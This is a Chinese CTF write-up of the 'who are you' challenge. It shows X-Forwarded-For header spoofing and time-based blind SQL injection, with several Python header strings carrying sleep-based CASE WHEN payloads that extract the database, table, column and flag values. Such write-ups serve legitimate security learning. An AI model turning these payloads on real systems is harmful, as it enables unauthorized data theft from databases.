實驗吧-who are you解題(時間盲注)
打開連接,展現內容以下所示:python
分析:首先想到這多是要僞造ip的題目,而後利用僞造IP的HTTP頭(例如:X-Forwarded-For等)。burp中成功進行僞造,以下圖所示:web
響應結果:sql
發現能夠成功進行僞造,可是這些sql語句好像字符串化了,看起來並不具備判斷性,接下來怎麼辦呢?數據庫
時間型的盲注?!code
利用select case when() then end語句,根據響應時間的差別判斷數據庫長度,數據庫表名,列名等,盲注語句以下所示:orm
# length of database
# header = {"X-Forwarded-For":"'+(select case when(select(length(database()))>%s) then 0 else sleep(6) end) and 'a'='a" % i}
# name of database
# header = {"X-Forwarded-For": "'+(select case when (substring((select database()) from %s for 1)='%s') then sleep(6) else 0 end) and 'a'='a" % (i,j)}
# length of table
# header = {"X-Forwarded-For": "'+(select case when(substring((select group_concat(table_name separator ';') from information_schema.tables where table_schema='web4') from %s for 1)='') then sleep(6) else 0 end) and 'a'='a" % i}
# name of table
# header = {"X-Forwarded-For": "'+(select case when(substring((select group_concat(table_name separator ';')"
# " from information_schema.tables where table_schema='web4') from %s for 1)='%s') then sleep(6) else 0 end) and 'a'='a" % (
# i, j)}
# length of column
# header = {
# "X-Forwarded-For": "'+(select case when(substring((select group_concat(column_name separator ';') "
# "from information_schema.columns where table_schema='web4' and table_name='flag') from %s for 1)='') "
# "then sleep(6) else 0 end) and 'a'='a" % i}
# name of column
# header = {"X-Forwarded-For": "'+(select case when(substring((select group_concat(column_name separator ';')"
# " from information_schema.columns where table_schema='web4' and table_name='flag') from %s for 1)='%s') then sleep(6) else 0 end) and 'a'='a" % (
# i, j)}
# length of flag
# header = {
# "X-Forwarded-For": "'+(select case when(substring((select group_concat(flag separator ';') "
# "from flag) from %s for 1)='') then sleep(6) else 0 end) and 'a'='a" % i}
# name of flag
header = {
"X-Forwarded-For": "'+(select case when(substring((select group_concat(flag separator ';') "
"from flag) from %s for 1)='%s') then sleep(6) else 0 end) and 'a'='a" % (i, j)}
結果以下:blog
相關文章
- 1. CTF writeup -who are you?
- 2. who are you?(i春秋)
- 3. i春秋 WEB who are you?
- 4. i春秋 who are you
- 5. 時間盲注
- 6. I love you not because of who you are, but because of who I am when I am with you.
- 7. Mysql時間盲注
- 8. git中提示 please tell me who you are
- 9. [CTF]No.0006 [強網杯] Who are you
- 10. SQL注入---時間盲注
- 更多相關文章...
- • SQLite 日期 & 時間 - SQLite教程
- • PHP 實例 - AJAX 實時搜索 - PHP教程
- • Spring Cloud 微服務實戰(三) - 服務註冊與發現
- • PHP Ajax 跨域問題最佳解決方案
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
最新文章
歡迎關注本站公眾號,獲取更多信息
相關文章